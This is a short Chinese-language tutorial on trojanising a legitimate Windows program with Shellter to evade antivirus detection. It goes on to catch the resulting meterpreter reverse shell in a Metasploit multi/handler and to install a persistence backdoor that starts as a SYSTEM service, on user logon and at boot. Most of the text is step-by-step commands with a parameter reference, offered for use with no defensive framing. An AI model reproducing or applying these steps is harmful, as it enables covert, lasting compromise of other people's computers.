Windows免杀木马+维持权限(shellter)

Windows免杀木马+维持权限(shellter)

一.生成木马

工具：shellter

环境：windows xp，Windows 7

操作：

• cmd 打开 shellter.exe

• 选择a，y

• 输入要注入木马的程序路径

• 选择y，l，1

• 输入返回的ip

• 最后回车就好了

二.开始监听

环境：kali

命令：

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.112(返回ip)
set LPORT 1234(端口)
run

拿到shell

三.维持权限

在shell下

自动切换到稳定的进程：

run post/windows/manage/migrate

安装后门：

run persistence -S -U -X -i 10 -p 5555 -r 192.168.1.122

具体参数含义：

-A   自动启动一个匹配的exploit / multi / handler来连接到代理
-L   如果未使用％TEMP％，则在目标主机中写入有效负载的位置。
-P   有效负载使用，默认为windows / meterpreter / reverse_tcp。
-S   作为服务自动启动代理程序（具有SYSTEM权限）
-T   要使用的备用可执行模板
-U   用户登录时自动启动代理
-X   系统引导时自动启动代理程序
-h   帮助菜单
-i   每次连接尝试之间的时间间隔（秒）
-p   运行Metasploit的系统正在侦听的端口
-r   运行Metasploit监听连接的系统的IP